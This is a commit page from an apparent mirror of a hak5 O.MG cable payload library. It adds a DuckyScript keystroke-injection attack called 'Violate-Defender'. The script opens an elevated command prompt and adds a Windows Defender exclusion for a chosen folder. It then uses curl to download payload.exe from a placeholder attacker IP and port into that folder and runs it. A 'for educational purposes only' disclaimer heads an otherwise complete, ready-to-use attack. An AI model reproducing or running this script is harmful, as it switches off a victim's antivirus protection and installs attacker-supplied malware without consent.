hak5
/
omg-payloads
mirror of https://github.com/hak5/omg-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Create Violate-Defender 

### FOR EDUCATIONAL PURPOSES ONLY ####  
This is a simple DuckyScript that has been tested on the O.MG cable. it is designed to create a rule expection to a folder usering powershell to circumvent Windows Defender. this may only work if the user/target in quesiton has elevated rights to run a cmd/powershell prompt as Administrator. the script will use the curl command and download a file from your attacker machine and place it into a  created folder of your choice while applying the execption to that folder.
pull/220/head
Tyler 2024-01-01 20:56:44 -05:00 committed by GitHub
parent 78066ea0c2
commit c1882928ee
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 38 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

38
payloads/library/remote_access/Violate-Defender Normal file
View File

@ -0,0 +1,38 @@
DUCKY_LANG US
DELAY 2000
GUI r
STRING cmd
DELAY 300
CTRL+SHIFT ENTER
DELAY 300
TAB
DELAY 200
TAB
DELAY 200
TAB
ENTER
DELAY 200
STRING powershell
DELAY 500
ENTER
STRING mkdir C:\<created folder of your choice> ### change me ###
DELAY 100
ENTER
STRING Add-MpPreference -ExclusionPath 'C:\folder of your choice' ### change me ###
ENTER
DELAY 500
STRING curl http://<---IP---->:<PORT>/payload.exe -o C:\folder_of_choice\created_payload.exe ### change me ###
ENTER
DELAY 500
STRING cd C:\<created folder>
ENTER
DELAY 200
STRING .\payload.exe ### change to desired, compiled payload ###
ENTER
DELAY 1000
STRING exit
ENTER
DELAY 100
STRING exit
DELAY 100
ENTER